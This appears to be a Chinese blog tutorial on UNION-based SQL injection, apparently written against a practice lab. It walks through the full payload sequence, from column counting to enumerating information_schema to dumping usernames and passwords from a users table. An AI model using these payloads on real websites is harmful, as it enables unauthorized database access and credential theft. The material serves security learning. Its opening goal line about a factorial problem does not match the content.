🏆今日学习目标：
🍀学会阶乘之和题目
✅创作者：贤鱼

union注入

原理

==利用union关键字==，union会将前后两次查询结果拼在一起，由于是联合查询，必须保证字段数一致，也就是两个查询结果有相同列数

过程

1 判断数字或者字符串注入类型
2 判断字段数，查询有几个字段
3 判断回显点，有些字段存在但是不会输出内容，我们需要找到会显示的字段数
4 注入库名
5 注入表名
6 注入列名
7 查数据

判断数字或者字符串

输入：
id=1
id=1'
id=1'--+==（--+是注释的意思）==

==为什么加个单引号会报错，而加个注释又会查询成功呢？==
举个栗子：‘xxx xxx xxx’这样子是正常的
‘xxx xxx id' xxx' 这样子第二个’是不是就会报错
'xxx xxx id'--+xxx'这样子后面的‘就被注释掉了，也就不会报错了

判断字段数

上文说过，union前后查询字段数必须一致，所以我们还要对字段数进行判断。在此可以利用==order by n==进行判断，意思是根据n个字段排序，如果不存在这个字段就会报错

这里依次查询1，2，3，4，5

4和5都会报错，所以可以得知，字段数为3
==当然 union也是可以用的==

第一个是1查询的，后面三个是1，2，3查询的，1，2，3，4依旧报错

判断回显点

这里的操作和上文union查询字段数一样

很明显，字段数3中，我们的1，2，3都输出了，所以回显点就是1，2，3

注入库名

查询到回显点，就要开始注入了，想要注入数据，必须得到他的库名
==获得库名可以用database（）函数==
如图：输入id=-1' union select 1,2,3 --+

我们再回显点2位置注入，发现成功获得了库名

当然，换个位置效果一样
分享几个查询数据库的方法

id=-1' union select 1,database(),3 --+
查看所有数据库名称
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata --+
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata limit1,1 --+ # 查询第2个数据
也可以用group_concat()函数将查询结果内容放入同一行
id=-1' union select 1,group_concat(SCHEMA_name),3 from information_schema.schemata --+

注入表名

有了库名就可以查询表名了

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables
where table_schema='库名' --+

就可以查询到表名了

注入列名

查询到库名和表名就可以查询列名

d=-1' union select 1,group_concat(column_name),group_concat(data_type) from
information_schema.columns where table_schema='库名' and table_name='表名' --+

查数据

接下来就是查询数据了

id=-1' union select 1,username,password from security.users limit 0,1 --+

id=-1' union select 1,concat(username,0x5c,password),3 from security.users limit 0,1 --+

id=-1' union select 1,group_concat(username,0x5c,password),3 from security.users
--+

concat() ：将两个字段结合成为一个字段

==🏆结束语union注入的大致流程就是这样了，有需要的话订阅一下专栏吧，持续更新的==